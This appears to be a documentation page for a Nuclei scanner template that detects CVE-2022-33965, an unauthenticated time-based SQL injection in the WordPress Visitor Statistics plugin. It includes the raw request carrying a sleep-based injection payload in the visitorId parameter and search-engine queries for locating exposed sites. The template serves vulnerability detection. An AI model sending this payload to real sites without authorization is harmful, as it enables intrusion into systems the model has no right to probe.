WordPress Visitor Statistics <=5.7 - SQL Injection
ID: CVE-2022-33965
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market
Description
Section titled “Description”WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2022-33965
info: name: WordPress Visitor Statistics <=5.7 - SQL Injection author: theamanrawat severity: critical description: | WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site. remediation: | Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability. reference: - https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities - https://wordpress.org/plugins/wp-stats-manager/ - https://wordpress.org/plugins/wp-stats-manager/#developers - https://nvd.nist.gov/vuln/detail/CVE-2022-33965 - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-33965 cwe-id: CWE-89 epss-score: 0.01516 epss-percentile: 0.86982 cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: plugins-market product: wp_visitor_statistics framework: wordpress shodan-query: http.html:"wp-stats-manager" fofa-query: body="wp-stats-manager" google-query: inurl:"/wp-content/plugins/wp-stats-manager" tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market
http: - raw: - | @timeout: 15s GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: dsl dsl: - 'duration>=7'
- type: regex regex: - "^1331' and sleep\\(7\\) or '$"
- type: status status: - 200# digest: 4a0a0047304502201ced8d069b368f415538651437beaf6caab9b4824a33ff23dce947feb7847216022100beadf4436cca5f056551e6ab718c6dd3a4ca642742eecbbc3819eee0d1fcc654:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-33965.yaml"